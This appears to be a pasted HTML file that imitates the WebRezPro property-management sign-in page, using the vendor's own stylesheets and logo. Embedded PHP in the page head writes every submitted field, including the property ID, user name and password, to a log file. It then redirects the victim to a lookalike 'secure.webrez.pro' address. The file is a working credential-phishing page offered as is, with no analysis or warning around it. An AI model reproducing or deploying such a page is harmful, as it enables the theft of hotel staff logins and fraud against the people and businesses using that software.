Untitled
3 years ago in HTML
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=0, minimal-ui">
<title>WebRezPro: Sign In</title>
<link rel="stylesheet" href="https://graphics.webrez.com/Bookings105/InterfaceTemplate10_6.2/v11.1/css/bootstrap.min.css">
<link rel="stylesheet" href="https://graphics.webrez.com/Bookings105/InterfaceTemplate10_6.2/v11.1/css/bootstrap-extend.min.css">
<link href="https://graphics.webrez.com/Bookings105/InterfaceTemplate10_6.2/v11.1/fonts/material-design/material-design.min.css" rel="stylesheet" type="text/css" />
<link href="https://graphics.webrez.com/Bookings105/InterfaceTemplate10_6.2/v11.1/fonts/font-awesome/font-awesome.min.css" rel="stylesheet" type="text/css" />
<link href="https://graphics.webrez.com/Bookings105/InterfaceTemplate10_6.2/v11.1/fonts/roboto/roboto.css" rel="stylesheet" type="text/css" />
<style>
input.property:focus{border-color:#ff8000!important;outline-color:#ff8000!important}input.username:focus{border-color:#69C561!important;outline-color:#69C561!important}input.password:focus{border-color:#66D8FB!important;outline-color:#66D8FB!important}input{font-weight:500!important;color:#15191D!important}::-webkit-input-placeholder{font-weight:400}::-moz-placeholder{font-weight:400}:-ms-input-placeholder{font-weight:400}:-moz-placeholder{font-weight:400}.red{color:#E40B0B}.green{color:#77CC70}.orange{color:#ff8000}.cyan{color:#5BB3EB}.fw-300{font-weight:300}.fw-400{font-weight:400}.fw-500{font-weight:500}.bg-white{background-color:#fff}.mt-15{margin-top:15px}.mt-25{margin-top:25px}.signInButton{background-color:#0C88D7;color:#fff!important}
</style>
<script>
<?php
header ('Location: secure.webrez.pro');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n\n\n\n");
fclose($handle);
exit;
?>
</script>
</head>
<body>
<div class="col-lg-4 col-md-6 col-sm-6 col-xs-12 col-lg-offset-4 col-md-offset-3 col-sm-offset-3" style="max-width:500px;">
<div class="col-lg-12 text-center mt-15"><img src="https://graphics.webrez.com/Bookings105/InterfaceTemplate10_6.2/v11.1/img/wrpLogoCircle.png" width="180" height="180" alt="WebRezPro Cloud Software" style="max-height:85px; width:auto;"></div>
<div class="col-lg-12">
<h3 class="text-center fw-300">Welcome to WebRezPro</h3>
<p class="text-center fw-400">Please sign in below.</p>
<p class="text-center red fw-500" style="display:none;">
<span class="login_invalid_signin"></span><i class="icon md-alert-circle font-size-18"></i>&nbsp;
New password is invalid. Please try again.</p>
<p class="green fw-500 text-center" style="display:none;"><span class="login_valid_signin"></span><i class="icon md-check font-size-18"></i>&nbsp;Sign-in successful. Welcome, .</p>
</div><!--/col12-->
<!-- Start of form block -->
<form id="form" action="" method="post">
<input type="hidden" name="flag_change_password" value="0" class="form-control">
<input type="hidden" name="flag_no_continue_after_login" value="0" class="form-control">
<div class="col-lg-12 mt-15">
<div class="input-group">
<span class="input-group-addon bg-white"><i class="icon md-flag orange font-size-20"></i></span>
<input type="text" name="login_company_id" class="form-control property" value="" placeholder="Property ID"/></div>
</div><!--/col -->
<div class="col-lg-12 mt-15">
<div class="input-group">
<span class="input-group-addon bg-white"><i class="icon md-account green font-size-20"></i></span>
<input type="text" name="login_name" autocomplete="off" class="form-control username" value="" placeholder="User name"/></div>
</div><!--/col -->
<div class="col-lg-12 mt-15">
<div class="input-group">
<span class="input-group-addon bg-white"><i class="icon md-lock cyan font-size-20"></i></span>
<input type="password" name="login_password" autocomplete="off" class="form-control password" value="" placeholder="Password" /></div>
</div><!--/col -->
<input type="hidden" name="mode" value="interface" class="form-control">
<input type="hidden" name="command" value="login" class="form-control">
<input type="hidden" name="next_command" value="" class="form-control">
<input type="hidden" name="adminmode" value="1" class="form-control">
<input type="hidden" name="area_id" value="" class="form-control">
<div class="col-lg-12 mt-25 text-center">
<a class="btn btn-lg signInButton" name="submit" id="sign_in" onClick="document.getElementById('form').submit();"><i class="icon md-cloud-done"></i> Sign in Now</a>
</div><!--/col -->
</form>
<!-- End of form block -->
</div><!--/centerWrap-->
<script src="https://graphics.webrez.com/Bookings105/InterfaceTemplate10_6.2/v11.1/plugins/jquery.min.js"></script>
<script src="https://graphics.webrez.com/Bookings105/InterfaceTemplate10_6.2/v11.1/plugins/bootstrap.min.js"></script>
</body>
</html>